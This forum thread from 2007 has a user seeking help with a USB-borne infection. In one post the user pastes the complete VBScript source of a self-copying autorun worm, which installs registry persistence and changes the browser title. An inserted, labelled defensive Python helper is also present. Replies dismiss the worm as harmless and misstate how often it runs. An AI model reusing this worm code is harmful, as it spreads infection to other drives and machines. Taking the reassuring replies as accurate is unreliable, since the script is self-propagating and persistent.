#1 gsoul2soul, 19-03-2007, 08:49 PM
SOS... hacker attack? or Bluff ?


After using the PENDRIVE at my office... I get this weird thing at HOME!!!

(point to note: I do check my pendrive with antivirus avast... and I update the virus definition daily)

And the virus software doesn't find anything on it!!!

Now... first of all my pendrive won't open when I double click... if I do, it takes time and opens in explorer (I can sense something has been started)

Then it's all fine and dandy... until i restart my PC (there's this weird TEXTfile that opens... on it there are some weird things written, more like language of some sort)

Then when I check my service... there is this one thing running "MFC32.DLL.VBS"
(which I can never... find, if I try to DELETE)... when I disable it by "msconfig" the notepad with that thing won't show!!

BUT......

When I open my IE browser, on the TITLE bar it's written Hacked by GNUlihd@gmail.com

HELP.... I'm scared to even log into my email accounts, is anybody logging me? or is it a prank? help
#2 gxsaurav, 19-03-2007, 09:22 PM
Re: SOS... hacker attack? or Bluff ?

Just a script which changed a few things in the registry.

You need to open the pen drive, try command prompt. You need to check that VBS file, it is not a virus just a prank, or Avast have found a malicious code. That VB script just changed the registry for the IE titlebar text.

Another option is Firefox: open Firefox & type <x>:\ in the address bar, where x is the drive letter of your pen drive. Then navigate to the file & read it.

From now on, just to be on the safe side, disable Autoplay for drives.
#3 gsoul2soul, 19-03-2007, 09:48 PM
Re: SOS... hacker attack? or Bluff ?

well... it's something in my PENDRIVE !!! (I'm sure... it's still there)

I tried doing like you said... even scanned my pendrive, it won't say anything.

I click on my "i drive" that's my pendrive... and suddenly it opens in "Explorer"

and WALLA.... the message "Hacked by GNUlihd@gmail.com" appears on IE title bar

Now... how the F@#K am I to see this file in my pendrive? how ? how?
I'm using Avast antivirus... and I updated my virus definition before I scanned the pen drive!!!

HELP !!!
#4 it_waaznt_me, 20-03-2007, 04:59 AM
Re: SOS... hacker attack? or Bluff ?

Start > Run > Cmd {Press Enter}
On the command prompt, type :
I: {Press Enter}

What do you see ?

Say the filename is MFC32.DLL.VBS

So the directory listing should be like :
I:\mfc32.dll.vbs

on the command prompt, type :
mkdir d:\safe

move mfc32.dll.vbs d:\safe\mfc.txt

The file should be moved to D drive with txt extension. You can now delete it safely.

[Edit] You may also use this guide. Provides step by step instructions on how to remove this particular virus.
__________________
Sleight of hand and twist of fate...
On a bed of nails she makes me wait...
And I wait without you ...
With or without you ..
----
Batty = Too Busy Now !!!

Last edited by it_waaznt_me; 20-03-2007 at 05:07 AM.
#5 gsoul2soul, 20-03-2007, 09:54 PM
Re: SOS... hacker attack? or Bluff ?

Well... I easily deleted "MFC32.DLL.VBS" and "Autorun" (in my pendrive and my C drive) by simply enabling the "View System files" in Folder option.

Anyways... I did open the script file with "notepad" and here's the whole thing:

Is it something dangerous or just that "IE title bar thing?"

******************************

'A mod from nepal V0.04
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MFC32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MFC32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MFC32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MFC32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MFC32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by GNUlihd@gmail.com"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

Last edited by gsoul2soul; 20-03-2007 at 09:57 PM. Reason: Automerged Doublepost
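Added example (not part of the thread and not any poster's code): a Python triage helper that decodes the attribute value 39 the posted script assigns to its copies, and flags [autorun] entries that launch a script host, as the script's "atr" string does. The function names, the host and extension lists and the benign sample are assumptions made for illustration.

```python
import re

# Attribute bits behind the script's "tf.attributes = N" lines
ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}
# Assumed lists of script hosts and script extensions worth flagging
SCRIPT_HOSTS = ("wscript", "cscript", "cmd", "mshta", "powershell")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd")


def decode_attributes(value):
    """Names of the attribute bits set in a numeric attribute value."""
    return [name for bit, name in ATTR_BITS.items() if value & bit]


def is_hidden_from_explorer(value):
    """Hidden+System files stay invisible until protected files are shown."""
    return bool(value & 2) and bool(value & 4)


def suspicious_autorun_entries(text):
    """(key, command) pairs in [autorun] that launch a script or script host."""
    hits, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if not in_section or "=" not in line or line.startswith(";"):
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        launches = key.lower() in ("open", "shellexecute") or re.fullmatch(
            r"shell\\[^\\]+\\command", key.lower())
        words = command.lower().replace('"', " ").split()
        if not launches or not words:
            continue
        host = words[0].rsplit("\\", 1)[-1].split(".")[0] in SCRIPT_HOSTS
        if host or any(w.endswith(SCRIPT_EXTS) for w in words):
            hits.append((key, command))
    return hits


# Constructed sample: the autorun.inf body the posted script writes ("atr")
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute=wscript.exe MFC32DLL.dll.vbs\r\n"
# Constructed benign file for comparison (hypothetical)
BENIGN_AUTORUN = "[autorun]\nicon=drive.ico\nopen=setup.exe\n"

if __name__ == "__main__":
    print(decode_attributes(39), is_hidden_from_explorer(39))
    print(suspicious_autorun_entries(SAMPLE_AUTORUN))
    print(suspicious_autorun_entries(BENIGN_AUTORUN))
```

Value 39 decodes to ReadOnly, Hidden, System and Archive, which is why the files only showed up after system files were made visible; value 32 (set just before each overwrite) clears those flags so the file can be rewritten.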
#6 it_waaznt_me, 21-03-2007, 12:02 AM
Re: SOS... hacker attack? or Bluff ?

Nothing dangerous, it's just changing the title bar of IE and checking and running the script file every hour.
#7 gtoX, 09-04-2007, 10:38 AM
Re: SOS... hacker attack? or Bluff ?

Anyways, it seems it's nothing harmful, just some kiddie working around with scripts to learn something. I found the fix for the problem in his/her (?) blog itself (http://matrixalaya.blogspot.com/2007...-gnulihd.html).


Have fun fixing the "virus"
__________________
The trouble with wanting something is the fear of losing it .....or never getting it. [ Max Payne(2) ]

What is mind? No Matter..... What is matter? Never Mind [Homer Simpson]